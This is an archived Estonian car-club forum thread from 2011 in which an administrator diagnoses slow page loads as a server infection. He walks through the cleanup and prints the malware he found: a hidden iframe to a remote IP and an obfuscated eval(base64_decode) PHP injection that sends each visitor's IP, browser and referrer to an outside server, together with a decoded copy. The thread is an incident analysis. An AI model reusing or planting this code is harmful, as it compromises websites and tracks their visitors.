+- Mercedes-Benz Eesti Klubi Foorum (https://foorum.clubmb.ee)
+-- Foorum: Mercedes-Benz Eesti Klubi (https://foorum.clubmb.ee/forumdisplay.php?fid=1)
+--- Foorum: Teated (https://foorum.clubmb.ee/forumdisplay.php?fid=100)
+--- Teema: Üldised foorumiga seonduvad küsimused/probleemid (/showthread.php?tid=24303)
RE: Üldised foorumiga seonduvad küsimused/probleemid - Helari - 31-10-2011
(31-10-2011, 02:15 PM)Laur Kirjutas: Foorum on kuidagi meeletult aeglaseks muutunud...
??
+1
RE: Üldised foorumiga seonduvad küsimused/probleemid - Werewolf - 31-10-2011
Mulle tundub ka, et täna lehed laevad kole pikalt. Eelnevalt seda probleemi vist polnud või ei pannud seda ennem nii hästi tähele.
RE: Üldised foorumiga seonduvad küsimused/probleemid - Harry - 31-10-2011
Probleem on antud seisuga teadmata. Võtsin ühendust zoneiga ning Indrek lubas saata zonei raporti meie viiruste teemadel. Peale neid oskan veidi paremini öelda.
Seniks aga mõned faktid:
- Kasutame päevas 1.38 GiB bandwidthi
- Saame kuus 53,5k hitti
- Postituste arv on ammu üle 100k
Seega ärge väga imestage, kui miski aeglane on ^^
RE: Üldised foorumiga seonduvad küsimused/probleemid - Harry - 31-10-2011
Ma vabandan. Vaatasin valet kohta, foorum.clubmb.ee'l on teine statistika ehk 6 655 536 hitti kuus ja 32 444 hitti TUNNIS!
RE: Üldised foorumiga seonduvad küsimused/probleemid - Laur - 31-10-2011
Postituste arv ei tähenda midagi.
Loen aegajalt ühte teist foorumit mille postituste arv on: Foorumis on 84263 teemat • 479515 postitust • 16637 kasutajat.
Mercedes-Benz foorum: Meie kasutajad on teinud kokku 100,610 postitust 10,289 teemas.
RE: Üldised foorumiga seonduvad küsimused/probleemid - Harry - 31-10-2011
Selles on sul õigus, aga hittide arv on väga väga kõrge. Teoorias peaksime me olema üks Eesti suurimaid portaale siis.
Igatahes, hetkel on selge et keegi ründab.
Isiklikult vaatan kasutajate ip'si. Kus mõned dünaamilised host-aadressid on hittinud meid üle 2000 korra. Ma kahtlen, et üks dyn host-aadress kestab üle hmm.. päeva? Seega see peab tõsine huviline olema.
Momendil ka kaldun arvama, et probleemi allikaks on vene foorum. Need kahtlased hittid pärinevad ka sealt. Hetkel ootan Indreku raportit, zone OFC pole midagi vastanud. Seega eks näis.. Kasutajat sellised asjad ohustatada ei tohiks, lihtsalt käivad pinda.
RE: Üldised foorumiga seonduvad küsimused/probleemid - Harry - 31-10-2011
Ok raport käes. Serveris on tehniliselt viirused, kuid kasutajat ei ohusta. Need on pageranki mõjutamiseks mõeldud iframeid, millega on mul kogemusi olnud. Paraku muidugi on failide maht suhteliselt suur, seega puhastus töö saab olema eepiline!
RE: Üldised foorumiga seonduvad küsimused/probleemid - Harry - 01-11-2011
Nii, asjad on tegemises. Paraku on failide kogus nii suur, et võtab aega.
Anyways, see on otsenene viiruse leht:
Kood:
http:// 195.2.252.137/ ftp.phpIdeeliselt ta sulle midagi ei tee, seega julgemad võivad proovida. See leht timeoutib täpselt sama kaua, kuni clubmb.ee lehed laevad..
Puhastamine võtab aega, loodab et zone saab asja automaatselt teha. See seletab ka ära, miks kusagil lehel on mingi alarm hakanud kisama. Ehk clubmb.ee üldise domeenina on kusagil nimekirjas, kui "bad site". See peaks kaduma automaatselt, kui probleem on kõrvaldatud ja kindlasti võtame suurimate lehekülgedega ise ühendust.
RE: Üldised foorumiga seonduvad küsimused/probleemid - Harry - 01-11-2011
Nii. Pildipark on korras!
Avastasin uue probleemi, kuid endiselt kinnitan et tava kasutaja jaoks ei ole tähtsust. Sest, need leheküljed on ammu maha võetud, kuigi viirus levib edasi. Mis tähendab, et mingi programm üritab ja üritab seda lehte leida.. seega on leht aeglane ja siis tuleb timeout.
RE: Üldised foorumiga seonduvad küsimused/probleemid - Harry - 01-11-2011
B1 Otsing peaks puhas olema ja tundub et suurem osa foorumist on ka puhas.
RE: Üldised foorumiga seonduvad küsimused/probleemid - Harry - 01-11-2011
Foorum on 100% puhas ja korras nüüd. Nagu näha siis laeb korralikult.
Vene foorumil tegin põhifailidele kontrolli ja puhastasin nad ära. Tundub et laeb normaalselt.
Detailsema puhastuse teen õhtul, kui istun veidi kiirema neti taga.. Kuid tähtsamad kohad on puhtad, nii et..
RE: Üldised foorumiga seonduvad küsimused/probleemid - indrek - 01-11-2011
Toimib kenasti jah, suured tänud
RE: Üldised foorumiga seonduvad küsimused/probleemid - v6sa - 01-11-2011
Lippab kenasti küll. Tänud, viiruseloomade tagaajamine võib päris huvitav ülesanne olla...
RE: Üldised foorumiga seonduvad küsimused/probleemid - Harry - 01-11-2011
Hetkel küll on veel 300 + 600 (~ arvud) faili vaja puhastada, kuid pole võimalik siit teha. Foorum küll on kindlasti korras, koos tähtsamate juurtega.
Viirustest veidi lähemalt. Viirus jõudis serverisse kellegi arvuti kaudu ehk kellegi FTP programm sai trooja. See käis kõik saidid üle ning bamm bamm lisas iframei html failidesse:
PHP Kood:
<iframe src='http://195.2.252.137/ftp.php' width='1' height='1' style='visibility: hidden;'></iframe>
PHP Kood:
<?php $_F=__FILE__;$_X='Pz48P3BocCAkM3JsID0gJ2h0dHA6Ly85Ni42OWUuYTZlLm8wL2J0LnBocCc7ID8+';
eval(base64_decode('JF9YPWJhc2U2NF9kZWNvZGUoJF9YKTskX1g9c3RydHIoJF9YLCcxMjM0NTZhb3VpZScsJ2FvdWllMTIzNDU2Jyk7JF9SPWVyZWdfcmVwbGFjZSgnX19GSUxFX18nLCInIi4kX0YuIiciLCRfWCk7ZXZhbCgkX1IpOyRfUj0wOyRfWD0wOw=='));
$ua = urlencode(strtolower($_SERVER['HTTP_USER_AGENT']));$ip = $_SERVER['REMOTE_ADDR'];
$host = $_SERVER['HTTP_HOST'];$uri = urlencode($_SERVER['REQUEST_URI']);
$ref = urlencode($_SERVER['HTTP_REFERER']);$url = $url.'?ip='.$ip.'&host='.$host.'&uri='.$uri.'&ua='.$ua.'&ref='.$ref; $tmp = file_get_contents($url); echo $tmp; ?>Teeme asja puhtamaks ja decodime:
PHP Kood:
$_F = __FILE__;
$_X = '?><?php $3rl = \'http://96.69e.a6e.o0/bt.php\'; ?>';
$_X = strtr($_X, '123456aouie','aouie123456');
$_R = ereg_replace('__FILE__',"'" . $_F . "'", $_X);
$_R = 0;
$_X = 0;
$ua = urlencode(strtolower($_SERVER['HTTP_USER_AGENT']));
$ip = $_SERVER['REMOTE_ADDR'];
$host = $_SERVER['HTTP_HOST'];
$uri = urlencode($_SERVER['REQUEST_URI']);
$ref = urlencode($_SERVER['HTTP_REFERER']);
$url = $url . '?ip=' . $ip . '&host=' . $host . '&uri=' . $uri . '&ua=' . $ua . '&ref='. $ref;
$tmp = file_get_contents($url);
echo $tmp;
See eval(base64_decode()); on veits lame, kuid päris kaval. Ehk, mõte on selles, et base64 teeb silmale keeruliseks mingi stringi ning eval() jooksutab selle.. Ehk näiteks ZWNobyAnS2FsbGUgb24gbGFoZSEnOw== --> echo 'Kalle on lahe!'; Ja kuigi peale base64_decode()'i oleks tegemist lihtsalt stringi, siis eval('echo 'Kalle on lahe!';') --> Kalle on lahe!. Ehk pm nad maskisid mingi möga ära. Siis lisasid selle rea alati peale ?> lõppu ning jõhkra spaceiga.. nii et ilma wordwrapita sa ei näeks seda
Noh, suht kaval, kuid nad ei arvestanud sellega, et nende emalaev ehk server tõmmatakse rajalt maha.. Mis tähendab, et jah.. tõesti uhke töö.. kuid vägagi mõttetu.Kogu asja mõte oli selles, et lisada mingi fail lehekülje lõppu. Mis teeks mingi pildi või lehekülje pageranki suuremaks.. Ehk pagerank scam = internet marketing. Realselt ohtu tavakasutajal ei olnud.
Ja kui kedagi huvitab, et kes selle taga on siis: http://en.utrace.de/ip-address/195.2.252.137
RE: Üldised foorumiga seonduvad küsimused/probleemid - indrek - 01-11-2011
Vene foorumi kaudu ta ka sisse sai, kui kunagi selle meie serverisse tagasi tõstsime
RE: Üldised foorumiga seonduvad küsimused/probleemid - Werewolf - 01-11-2011
Väga tubli töö taas!
Ei mäleta, et lehed olex selles foorumis kunagi nii kiiresti avanenud. Praktiliselt silmapilkselt, ei mingit laadeaega.
RE: Üldised foorumiga seonduvad küsimused/probleemid - Harry - 02-11-2011
Kui nett aeglane või mingi cellular device, siis: http://foorum.clubmb.ee/archive/index.php peaks veelgi kiirem olema, kahjus küll ei saa sealt vastata
RE: Üldised foorumiga seonduvad küsimused/probleemid - killer666 - 16-11-2011
Kas selle taga olid siis samad vennad tartust,kes nyyd suure k6muga kinni pandi¿
?
RE: Üldised foorumiga seonduvad küsimused/probleemid - Harry - 17-11-2011
Ei oska kommenteerida. Kuid tegemist oli internatsionaalse rünnakuga. Ning catch-server oli Moskvas.
RE: Üldised foorumiga seonduvad küsimused/probleemid - Harry - 17-11-2011
Ok väikese kommentaari võin teha küll. Pm ei usu, et antud juhul oli tegemist samade inimestega, kuid meetod on täpselt sama. Eestlaste roll oli lihtsalt näha võimalust ja kasutasid seda. Muidugi, muljetavaldav oli näha "marketing" lehekülge sellist jama ajamas.. See jutt, et kodulehele pole võimalik väljast ligi pääseda ning need kodulehed teadlikult seda koodi seal hoidsid, on muidugi vale. Antud skeem käis läbi puhta häkkimise ning viiruste kaudu.
Tegelen isegi SEO parandamisega, kuid selline meetod on vägagi ebaeetiline.